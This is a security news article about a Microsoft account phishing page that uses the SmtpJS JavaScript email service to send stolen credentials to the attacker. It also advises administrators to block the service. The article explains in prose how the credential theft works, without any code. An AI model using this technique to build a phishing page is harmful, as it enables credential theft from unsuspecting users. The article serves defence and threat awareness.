Microsoft Phishing Page

A new landing page for a Microsoft account phishing scam has been discovered that utilizes the SmtpJS service to send stolen credentials via email to the attacker.

There is nothing special about the appearance of the Microsoft account phishing page shown below that was discovered by MalwareHunterTeam. It's your standard Microsoft login template that will ask you for your Microsoft credentials and then tell you that the submitted credentials are incorrect.

Microsoft Phishing Landing Page
Microsoft Phishing Landing Page

When users submit their credentials in phishing scams like this, the page typically saves them to a database for retrieval later or uses a backend script to send them off to the attacker.

This particular landing page does something different by utilizing the SmtpJS service to send an email to the attacker via JavaScript.

For security researchers and analysts, the advantage to this is that they can simply view the source for the landing page to see the configuration being used by SmtpJS as shown below.

SMTPJS Script Config
SmtpJS Script Config

The embedded config includes the sender email address the stolen credentials will be sent as, the address they will be sent to, and the secure token need to send email via SmtpJS. Using this information analysts and researchers can potentially link the attacker to other campaigns and make it easier for law enforcement to track them.

This configuration is passed along to smtpjs.com when a user enters their credentials so that it can generate an email to the specified user as shown below.

Sending stolen credentials to the attacker
Sending stolen credentials to the attacker

While researchers benefit from the public config used by SmtpJS, system administrators can also benefit by blocking the service on their web filters. 

Unless this service is absolutely needed in your organization, you can simply block access to the smtpjs site and phishing pages that utilize it won't be able to receive any submitted credentials.

This is also another example of how understanding the underlying infrastructure of a security threat can better allow system and network administrators to protect their users.

Related Articles:

Hijacked subdomains of major brands used in massive spam campaign

Google's new AI search results promotes sites pushing malware, scams

New Darcula phishing service targets iPhone users via iMessage

New MFA-bypassing phishing kit targets Microsoft 365, Gmail accounts

Over 100 US and EU orgs targeted in StrelaStealer malware attacks